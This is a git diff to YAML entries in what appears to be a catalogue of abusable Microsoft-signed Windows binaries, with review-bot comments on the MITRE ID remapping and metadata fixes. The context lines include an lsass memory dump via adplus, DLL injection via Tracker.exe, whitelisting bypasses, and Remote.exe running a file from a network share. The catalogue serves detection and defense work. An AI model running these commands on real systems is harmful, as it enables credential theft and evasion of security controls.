diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index 1827ef8..d2a0684 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -9,7 +9,7 @@ Commands: Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 Full_Path: - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index caeb515..0316d71 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -9,7 +9,7 @@ Commands: Usecase: Defense evasion Category: ADS Privileges: Admin - MitreID: T1562 + MitreID: T1562.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\fltMC.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 9047c45..ece23f5 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml 
@@ -9,37 +9,35 @@ Commands: Usecase: Compile and run code Category: AWL bypass Privileges: User - MitreID: T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code Category: Execute Privileges: User - MitreID: T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe @sample.rsp - Description: Executes Logger statements from rsp file + Description: Executes Logger statements from rsp file Usecase: Execute DLL Category: Execute Privileges: User - MitreID: T1127 - MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger dll file with TargetLogger export Usecase: Execute DLL Category: Execute Privileges: User - MitreID: T1127 - MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters Category: Execute Privileges: User - MitreID: T1127 + MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 9b6e9b5..a1b6052 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml 
@@ -9,14 +9,14 @@ Commands: Usecase: Spawn process using other binary Category: Execute Privileges: Administrator - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 2004 - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 1909 Full_Path: - Path: C:\Windows\System32\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index d70dd3e..22c7cd1 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -9,7 +9,7 @@ Commands: Usecase: Spawn process using other binary Category: Execute Privileges: Administrator - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 1809 and newer - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 1857b55..8005637 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -2,7 +2,7 @@ Name: adplus.exe Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x -Created: 1/9/2021 +Created: 2021-09-01 Commands: - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet Description: Creates a memory dump of the lsass process diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index cbf4b4c..e9ff890 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml 
@@ -9,7 +9,7 @@ Commands: Usecase: Local execution of assembly shellcode. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows - Command: | cdb.exe -pd -pn @@ -18,7 +18,7 @@ Commands: Usecase: Run a shell command under a trusted Microsoft signed binary Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 07488e9..173d3bf 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -9,7 +9,7 @@ Commands: Usecase: Local execution of unsigned C# code. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 232e362..5b3e217 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -9,14 +9,14 @@ Commands: Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. https://i.imgur.com/Go7rc0I.png Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index 7e5e4e6..b6fed3b 100644 --- a/yml/OtherMSBinaries/Dnx.yml 
+++ b/yml/OtherMSBinaries/Dnx.yml @@ -9,7 +9,7 @@ Commands: Usecase: Local execution of C# project stored in consoleapp folder. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: N/A diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index a9b5b5e..85075e9 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -9,7 +9,7 @@ Commands: Usecase: Local execution of a process as a subprocess of Dxcap.exe Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: C:\Windows\System32\dxcap.exe diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 7fc4a83..c2e3188 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -9,14 +9,14 @@ Commands: Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows - Command: Mftrace.exe powershell.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index 51ac531..96311e5 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -1,6 +1,6 @@ --- Name: ntdsutil.exe -Description: Command line utility used to export Actove Directory. +Description: Command line utility used to export Active Directory. Author: 'Tony Lambert' Created: 2020-01-10 Commands: diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 6386ef2..727a311 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml 
@@ -9,14 +9,14 @@ Commands: Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 056b8ab..8c5e1d7 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -9,21 +9,21 @@ Commands: Usecase: Executes a process under a trusted Microsoft signed binary Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 50da850..ad99835 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -9,7 +9,7 @@ Commands: Usecase: Execute Visual Basic script stored in local Windows Script Component file. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index 05c8b00..40ad775 100644 --- a/yml/OtherMSBinaries/Tracker.yml 
+++ b/yml/OtherMSBinaries/Tracker.yml @@ -9,14 +9,14 @@ Commands: Usecase: Injection of locally stored DLL file into target process. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index 417bc49..5177e12 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -9,7 +9,7 @@ Commands: Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe. Category: Execute Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\vsjitdebugger.exe diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 279f83d..efe48fb 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -9,7 +9,7 @@ Commands: Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User - MitreID: T1218 + MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
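Review bot: The T1218 to T1127 change in the Aspnet_Compiler.yml hunk is repeated verbatim across the Ttdinject, Tttracer, Cdb, Csi, Devtoolslauncher, Dnx, Dxcap, Mftrace, Rcsi, Remote, Te, Tracker, Vsjitdebugger and Wfc hunks, but nothing in the patch says why; please put the rationale in the commit message (which binaries count as developer utilities and why the parent T1127 is used everywhere except Msbuild.yml, where the sub-technique T1127.001 is used), since detection content and coverage maps built from this catalogue key off the MitreID field and a silent bulk remap is hard to audit later.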
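Review bot: In the Msbuild.yml hunk the Description line of the `msbuild.exe @sample.rsp` entry is removed and re-added with no visible difference ("- Description: Executes Logger statements from rsp file" / "+ Description: Executes Logger statements from rsp file"), so this is presumably a trailing-whitespace or indentation fix; say so in the commit message so reviewers don't search for a wording change. The two dropped MitreLink lines (accounted for by the -9,37 +9,35 header) only existed on two of the five entries, so removing them makes the file consistent, but confirm the site generator builds the ATT&CK link from MitreID rather than reading MitreLink before merging. While in this file, the first entry's "Category: AWL bypass" differs in case from the "AWL Bypass" used in Aspnet_Compiler.yml, Rcsi.yml, Remote.yml, Tracker.yml and Wfc.yml; normalise it so a filter on the Category value matches all of them.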
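Review bot: The Adplus.yml hunk rewrites "Created: 1/9/2021" as "Created: 2021-09-01", which silently chooses the day-first reading; 9 January 2021 (2021-01-09) is an equally plausible reading of the original. Confirm the intended date with the author (mr.d0x) or from the file's git history before merging. The ISO format itself is right and matches the "Created: 2020-01-10" visible in the Ntdsutil.yml hunk.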
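Review bot: In the FltMC.yml hunk the move to the sub-technique T1562.001 is more precise than the parent T1562, but the same entry carries "Category: ADS" alongside "Usecase: Defense evasion", and those two fields do not appear to describe the same behaviour; since the entry is being touched anyway, check whether ADS is really the intended Category value here.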
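Review bot: In the Mftrace.yml hunk the context lines show the second command is `Mftrace.exe powershell.exe`, yet its Description reads "Launch cmd.exe as a subprocess of Mftrace.exe."; the Usecase on the next line already says powershell.exe, so the Description should too. The hunk already edits this entry, so fix the copy-paste slip here rather than in a follow-up.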
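Review bot: In the Remote.yml hunk all three entries have an empty "OperatingSystem:" value. Either fill it in or make the unknown explicit, so that the field does not publish as a blank string while every other file in this patch gives a value; the Full_Path context ("C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe") suggests the author knows which SDK version it was tested with.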
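Review bot: The trailing context of the Rcsi.yml, Te.yml and Tracker.yml hunks shows an empty "Full_Path: - Path:" in each file. Populate the path or use the explicit "- Path: N/A" that the Dnx.yml hunk already uses, so downstream consumers (for example, path-based allow-list or detection rules generated from this catalogue) can distinguish "not applicable" from "not yet filled in".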
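Review bot: In the Devtoolslauncher.yml hunk the first entry's Usecase embeds a screenshot URL (https://i.imgur.com/Go7rc0I.png) inside the prose; move the link to a reference field if the schema has one so Usecase stays a short description, and note that the Path value is single-quoted ('c:\windows\system32\devtoolslauncher.exe') unlike every other Path in this patch. Separately, the Tttracer.yml hunk ends before the second entry's MitreID; that entry ("Dumps process using tttracer.exe") records a memory dump rather than spawning a process, so check that it is not blanket-remapped to T1127 along with the first entry.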